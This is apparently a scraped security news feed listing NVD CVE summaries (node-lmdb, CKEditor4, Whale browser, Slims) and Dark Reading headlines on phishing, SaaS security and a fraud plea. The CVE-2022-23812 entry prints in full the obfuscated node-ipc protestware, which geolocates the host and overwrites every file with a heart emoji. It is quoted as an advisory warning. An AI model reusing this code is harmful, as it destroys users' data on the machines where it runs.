βΌ CVE-2022-21164 βΌ
π Read
via "National Vulnerability Database".
The package node-lmdb before 0.9.7 are vulnerable to Denial of Service (DoS) when defining a non-invokable ToString value, which will cause a crash during type check.π Read
via "National Vulnerability Database".
βΌ CVE-2022-23812 βΌ
π Read
via "National Vulnerability Database".
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };π Read
via "National Vulnerability Database".
βΌ CVE-2021-45822 βΌ
π Read
via "National Vulnerability Database".
A cross-site scripting vulnerability is present in Xbtit 3.1. The stored XSS vulnerability occurs because /ajaxchat/sendChatData.php does not properly validate the value of the "n" (POST) parameter. Through this vulnerability, an attacker is capable to execute malicious JavaScript code.π Read
via "National Vulnerability Database".
βΌ CVE-2022-24729 βΌ
π Read
via "National Vulnerability Database".
CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. CKEditor4 prior to version 4.18.0 contains a vulnerability in the `dialog` plugin. The vulnerability allows abuse of a dialog input validator regular expression, which can cause a significant performance drop resulting in a browser tab freeze. A patch is available in version 4.18.0. There are currently no known workarounds.π Read
via "National Vulnerability Database".
βΌ CVE-2022-24728 βΌ
π Read
via "National Vulnerability Database".
CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4 prior to version 4.18.0. The vulnerability allows someone to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. This problem has been patched in version 4.18.0. There are currently no known workarounds.π Read
via "National Vulnerability Database".
π΄ Microsoft the No. 1 Most-Spoofed Brand in Phishing Attacks π΄
π Read
via "Dark Reading".
New Barracuda Networks data shows attackers sent some 3 million emails from around 12,000 pilfered accounts.π Read
via "Dark Reading".
Dark Reading
Microsoft the No. 1 Most-Spoofed Brand in Phishing Attacks
New Barracuda Networks data shows attackers sent some 3 million emails from around 12,000 pilfered accounts.
π1
π΄ What the Newly Signed US Cyber-Incident Law Means for Security π΄
π Read
via "Dark Reading".
Bipartisan cybersecurity legislation comes amid increased worries over ransomware, and fears of cyberattacks from Russia in the wake of its invasion of Ukraine.π Read
via "Dark Reading".
Dark Reading
What the Newly Signed US Cyber-Incident Law Means for Security
Bipartisan cybersecurity legislation comes amid increased worries over ransomware, and fears of cyberattacks from Russia in the wake of its invasion of Ukraine.
βΌ CVE-2022-26295 βΌ
π Read
via "National Vulnerability Database".
A stored cross-site scripting (XSS) vulnerability in /ptms/?page=user of Online Project Time Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the user name field.π Read
via "National Vulnerability Database".
βΌ CVE-2022-26293 βΌ
π Read
via "National Vulnerability Database".
Online Project Time Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the function save_employee at /ptms/classes/Users.php.π Read
via "National Vulnerability Database".
π΄ 4 Critical Capabilities for a SaaS Security Posture Management (SSPM) Solution π΄
π Read
via "Dark Reading".
The need for deep visibility and remediation for SaaS security settings is critical. If you're considering a SaaS Security Posture Management solution, hereβs a checklist of what to look for.π Read
via "Dark Reading".
Dark Reading
4 Critical Capabilities for a SaaS Security Posture Management (SSPM) Solution
The need for deep visibility and remediation for SaaS security settings is critical. If you're considering a SaaS Security Posture Management solution, hereβs a checklist of what to look for.
π΄ How Pen Testing Gains Critical Security Buy-in and Defense Insight π΄
π Read
via "Dark Reading".
It's more important than ever for companies to challenge their defenses, learning about new gaps and opportunities for improvement along the way.π Read
via "Dark Reading".
Dark Reading
How Pen Testing Gains Critical Security Buy-in and Defense Insight
It's more important than ever for companies to challenge their defenses, learning about new gaps and opportunities for improvement along the way.
π΄ TAC Security Survey Reveals: 88% of Businesses Rely on Manual Processes to Identify Network Vulnerabilities π΄
π Read
via "Dark Reading".
π Read
via "Dark Reading".
Dark Reading
TAC Security Survey Reveals: 88% of Businesses Rely on Manual Processes to Identify Network Vulnerabilities
βΌ CVE-2022-24075 βΌ
π Read
via "National Vulnerability Database".
Whale browser before 3.12.129.18 allowed extensions to replace JavaScript files of the HWP viewer website which could access to local HWP files. When the HWP files were opened, the replaced script could read the files.π Read
via "National Vulnerability Database".
βΌ CVE-2022-24074 βΌ
π Read
via "National Vulnerability Database".
Whale Bridge, a default extension in Whale browser before 3.12.129.18, allowed to receive any SendMessage request from the content script itself that could lead to controlling Whale Bridge if the rendering process compromises.π Read
via "National Vulnerability Database".
βΌ CVE-2022-24073 βΌ
π Read
via "National Vulnerability Database".
The Web Request API in Whale browser before 3.12.129.18 allowed to deny access to the extension store or redirect to any URL when users access the store.π Read
via "National Vulnerability Database".
βΌ CVE-2022-24072 βΌ
π Read
via "National Vulnerability Database".
The devtools API in Whale browser before 3.12.129.18 allowed extension developers to inject arbitrary JavaScript into the extension store web page via devtools.inspectedWindow, leading to extensions downloading and uploading when users open the developer tool.π Read
via "National Vulnerability Database".
βΌ CVE-2022-1000 βΌ
π Read
via "National Vulnerability Database".
Path Traversal in GitHub repository prasathmani/tinyfilemanager prior to 2.4.7.π Read
via "National Vulnerability Database".
βΌ CVE-2021-45791 βΌ
π Read
via "National Vulnerability Database".
Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/member_type.php, /admin/modules/system/user_group.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users.π Read
via "National Vulnerability Database".
βΌ CVE-2021-45792 βΌ
π Read
via "National Vulnerability Database".
Slims9 Bulian 9.4.2 is affected by Cross Site Scripting (XSS) in /admin/modules/system/custom_field.php.π Read
via "National Vulnerability Database".
π΄ Enhancing DLP With Natural Language Understanding for Better Email Security π΄
π Read
via "Dark Reading".
Natural language understanding is well-suited for scanning enterprise email to detect and filter out spam and other malicious content. Armorblox introduces a data loss prevention service to its email security platform using NLU.π Read
via "Dark Reading".
Dark Reading
Enhancing DLP With Natural Language Understanding for Better Email Security
Natural language understanding is well-suited for scanning enterprise email to detect and filter out spam and other malicious content. Armorblox introduces a data loss prevention service to its email security platform using NLU.
ποΈ βFox guarding the henhouseβ β Founder of cyber-fraud prevention company pleads guilty to defrauding investors ποΈ
π Read
via "The Daily Swig".
Adam Rogas has been charged with using fraudulent financial data to secure more than $100m in fundingπ Read
via "The Daily Swig".
The Daily Swig | Cybersecurity news and views
βFox guarding the henhouseβ β Founder of cyber-fraud prevention company pleads guilty to defrauding investors
Adam Rogas has been charged with using fraudulent financial data to secure more than $100m in funding